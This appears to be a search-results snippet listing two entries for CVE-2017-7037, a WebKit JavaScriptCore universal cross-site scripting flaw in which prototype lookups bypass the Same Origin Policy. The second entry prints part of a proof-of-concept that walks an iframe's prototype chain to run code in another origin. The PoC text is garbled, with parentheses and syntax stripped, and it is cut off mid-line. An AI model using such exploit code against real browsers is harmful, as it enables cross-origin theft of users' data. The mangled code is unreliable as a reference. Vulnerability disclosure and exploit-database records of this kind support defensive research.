2 matches found
WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive(CVE-2017-7037)
JSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. So JSDOMWindow::getPrototype which checks the Same Origin Policy is not called. The PoC shows to call a setter of another origin's object. PoC 1 -...
WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting
let f = document.body.appendChilddocument.createElement'iframe'; let loc = f.contentWindow.location; f.onload = = let a = 1.2; a.proto.proto = f.contentWindow; a'test' = toString: function arguments.callee.caller.constructor'alertlocation'; ; ; f.src = 'data:text/html,' +...